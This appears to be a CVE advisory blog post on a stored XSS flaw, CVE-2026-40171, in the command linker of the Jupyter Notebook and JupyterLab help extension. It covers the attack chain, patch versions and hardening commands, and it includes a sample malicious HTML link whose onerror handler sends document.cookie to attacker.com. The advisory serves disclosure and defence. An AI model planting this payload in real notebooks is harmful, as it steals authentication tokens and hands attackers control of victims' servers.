Listen to this Post
The vulnerability resides in the help extension of Jupyter Notebook (version 7.x) and JupyterLab (version 4.x), specifically its command linker functionality. When a user opens a maliciously crafted notebook, the attacker can inject an XSS payload that exploits the way command linkers handle attributes.
1. Root cause: The command linker module, responsible for building interactive help dialogs, does not sufficiently sanitize user-controlled attributes.
2. Attack vector: An attacker creates a notebook containing a help command that references a malicious command linker attribute.
3. Trigger: The payload is stored in the notebook and waits for user interaction (e.g., clicking a button or link that appears legitimate).
4. XSS activation: Upon interaction, the injected JavaScript executes in the context of the Jupyter web interface.
5. Token theft: The script steals the victim’s authentication token (cookie or bearer token) and sends it to an attacker-controlled server.
6. Account takeover: With the stolen token, the attacker impersonates the victim against the Jupyter REST API.
7. Full control: The API grants the attacker the ability to read, modify, or delete any file accessible by the victim’s server.
8. Kernel access: The attacker can attach to running kernels and execute arbitrary Python or shell commands.
9. Privilege escalation: Using the API, the attacker can spawn new terminals, gaining direct shell access to the underlying system.
10. Persistence: The attacker can modify the victim’s notebook configuration to maintain access even after a token refresh.
The vulnerability is cataloged as CVE-2026-40171 and was reported by Daniel Teixeira of the NVIDIA AI Red Team.
DailyCVE Form
| Field | Value |
|-|-|
| Platform | Jupyter Notebook |
| Version | 7.0.0–7.5.5 |
| Vulnerability | Stored XSS / Token theft |
| Severity | High |
| Date | 2026-04-30 |
| Prediction | Already patched (2026-04-30) |
What Undercode Say:
Check affected versions
jupyter notebook --version
jupyter lab --version
Disable the vulnerable help extension (workaround)
jupyter labextension disable @jupyter-notebook/help-extension
jupyter labextension disable @jupyterlab/help-extension
Apply the patch (upgrade to fixed versions)
pip install --upgrade notebook==7.5.6
pip install --upgrade jupyterlab==4.5.7
Disable command linker permanently via overrides.json
cat > ~/.jupyter/lab/user-settings/@jupyterlab/apputils-extension/sanitizer.jupyterlab-settings <<EOF
{
"@jupyterlab/apputils-extension:sanitizer": {
"allowCommandLinker": false
}
}
EOF
Exploit:
A malicious notebook contains an HTML cell like:
<a href="javascript:void(0)"
data-command-linker='{"id":"help:open","args":{"text":"<img src=x onerror=fetch(`https://attacker.com/steal?token=${document.cookie}`)>"}}'>
Click here for documentation
</a>
When the victim clicks the seemingly innocent link, the `onerror` event fires, exfiltrating authentication cookies to the attacker.
Protection from this CVE
- Upgrade immediately to Notebook 7.5.6 or JupyterLab 4.5.7.
- Disable the help extension as a temporary workaround using the CLI commands above.
- Disable command linker globally via `overrides.json` (as shown in the hardening section).
- Enforce Content Security Policy (CSP) headers to restrict execution of untrusted scripts.
- Monitor network requests for unexpected outbound API calls (e.g., detect `fetch` to external domains).
Impact
- Account takeover – full control over the victim’s Jupyter environment.
- Data breach – reading, modifying, or deleting all files accessible by the victim.
- Code execution – arbitrary code execution on the server via kernel manipulation.
- System compromise – creation of terminals for persistent shell access.
- Lateral movement – use the compromised server to pivot into internal networks.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
